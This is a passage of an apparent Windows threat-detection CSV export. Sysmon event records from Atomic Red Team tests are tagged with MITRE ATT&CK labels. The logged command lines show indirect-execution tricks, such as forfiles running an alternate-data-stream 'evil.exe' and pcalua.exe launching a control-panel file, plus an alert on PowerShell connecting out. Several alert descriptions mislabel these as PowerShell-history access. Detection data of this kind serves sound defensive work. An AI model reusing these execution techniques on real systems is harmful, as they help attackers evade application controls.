<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
<Data Name=""ParentProcessId"">5632</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548999.931135,2019-07-19T19:09:59.931135+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T15:09:43.329083Z"">
</TimeCreated>
<EventRecordID>4107</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 15:09:43.301</Data>
<Data Name=""ProcessGuid"">747F3D96-DD37-5D31-0000-00109D4C4900</Data>
<Data Name=""ProcessId"">5632</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D4B8-5D31-0000-0010A8CE0600</Data>
<Data Name=""ParentProcessId"">4416</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1563548980.973075,2019-07-19T19:09:40.973075+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:58.359021Z"">
</TimeCreated>
<EventRecordID>4105</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3400"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-19 14:57:52.847</Data>
<Data Name=""ProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ProcessId"">3912</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49734</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548278.359021,2019-07-19T18:57:58.359021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:55.236766Z"">
</TimeCreated>
<EventRecordID>4104</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:55.181</Data>
<Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-001061933F00</Data>
<Data Name=""ProcessId"">1724</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548275.236766,2019-07-19T18:57:55.236766+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:55.138826Z"">
</TimeCreated>
<EventRecordID>4103</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:55.056</Data>
<Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-0010918F3F00</Data>
<Data Name=""ProcessId"">4092</Data>
<Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">forfiles /p c:\windows\system32 /m notepad.exe /c c:\folder\normal.dll:evil.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA73-5D31-0000-00106A8D3F00</Data>
<Data Name=""ParentProcessId"">1052</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548275.138826,2019-07-19T18:57:55.138826+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:55.069079Z"">
</TimeCreated>
<EventRecordID>4102</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:55.024</Data>
<Data Name=""ProcessGuid"">747F3D96-DA73-5D31-0000-00106A8D3F00</Data>
<Data Name=""ProcessId"">1052</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c &quot; c:\folder\normal.dll:evil.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548274.165319,2019-07-19T18:57:54.165319+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\forfiles.exe) tried accessing powershell history through commandline ( forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:54.129841Z"">
</TimeCreated>
<EventRecordID>4100</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:54.123</Data>
<Data Name=""ProcessGuid"">747F3D96-DA72-5D31-0000-001056513F00</Data>
<Data Name=""ProcessId"">3680</Data>
<Data Name=""Image"">C:\Windows\System32\forfiles.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">ForFiles - Executes a command on selected files</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B7002C1601C326ED60C38E23366E5E8C919F326A,MD5=6E9F3CBB041D0670E2AC3378C3360045,SHA256=FA84D5B043EAD140FE304CBC71A9BFB3D24D3542FAB45DB65606C47808BD9272,IMPHASH=BB3BC1A3FEF88F916302D61DDC886F80</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA72-5D31-0000-0010044F3F00</Data>
<Data Name=""ParentProcessId"">1300</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548274.129841,2019-07-19T18:57:54.129841+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:54.099318Z"">
</TimeCreated>
<EventRecordID>4099</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:54.080</Data>
<Data Name=""ProcessGuid"">747F3D96-DA72-5D31-0000-0010044F3F00</Data>
<Data Name=""ProcessId"">1300</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548274.099318,2019-07-19T18:57:54.099318+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:53.882434Z"">
</TimeCreated>
<EventRecordID>4098</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:53.815</Data>
<Data Name=""ProcessGuid"">747F3D96-DA71-5D31-0000-00101A463F00</Data>
<Data Name=""ProcessId"">6168</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c </Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548273.882434,2019-07-19T18:57:53.882434+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a C:\Windows\system32\javacpl.cpl ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:52.982726Z"">
</TimeCreated>
<EventRecordID>4097</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:52.816</Data>
<Data Name=""ProcessGuid"">747F3D96-DA70-5D31-0000-00100E2C3F00</Data>
<Data Name=""ProcessId"">112</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">pcalua.exe -a C:\Windows\system32\javacpl.cpl</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=E6A15B8FF17F8656458581FC0B97B0852F69F362,MD5=1E9E8B2CFCFDA570B5E07C014770A1B3,SHA256=36EF04735ADFFF417AE761BF6595BADB54A4CCEB3550ABA7CFD4F7234C90EE7D,IMPHASH=9580FB84ACAA83C6D353A5A1F7F5E653</Data>
<Data Name=""ParentProcessGuid"">747F3D96-DA70-5D31-0000-001007293F00</Data>
<Data Name=""ParentProcessId"">608</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot;</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1563548272.982726,2019-07-19T18:57:52.982726+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:52.923610Z"">
</TimeCreated>
<EventRecordID>4096</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:52.784</Data>
<Data Name=""ProcessGuid"">747F3D96-DA70-5D31-0000-001007293F00</Data>
<Data Name=""ProcessId"">608</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; /c &quot;pcalua.exe -a C:\Windows\system32\javacpl.cpl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\AtomicRedTeam\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-D4B4-5D31-0000-002051090500</Data>
<Data Name=""LogonId"">0x50951</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-D6F7-5D31-0000-00104ACE2500</Data>
<Data Name=""ParentProcessId"">3912</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">powershell</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1202] Indirect Command Execution,1563548272.92361,2019-07-19T18:57:52.923610+04:00,,Threat,Medium,Found User (MSEDGEWIN10\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried accessing powershell history through commandline ( pcalua.exe -a Java ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-19T14:57:50.453840Z"">
</TimeCreated>
<EventRecordID>4095</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2796"" ThreadID=""3592"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-19 14:57:50.232</Data>
<Data Name=""ProcessGuid"">747F3D96-DA6E-5D31-0000-001081F93E00</Data>
<Data Name=""ProcessId"">1284</Data>
<Data Name=""Image"">C:\Windows\System32\pcalua.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Program Compatibility Assistant</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
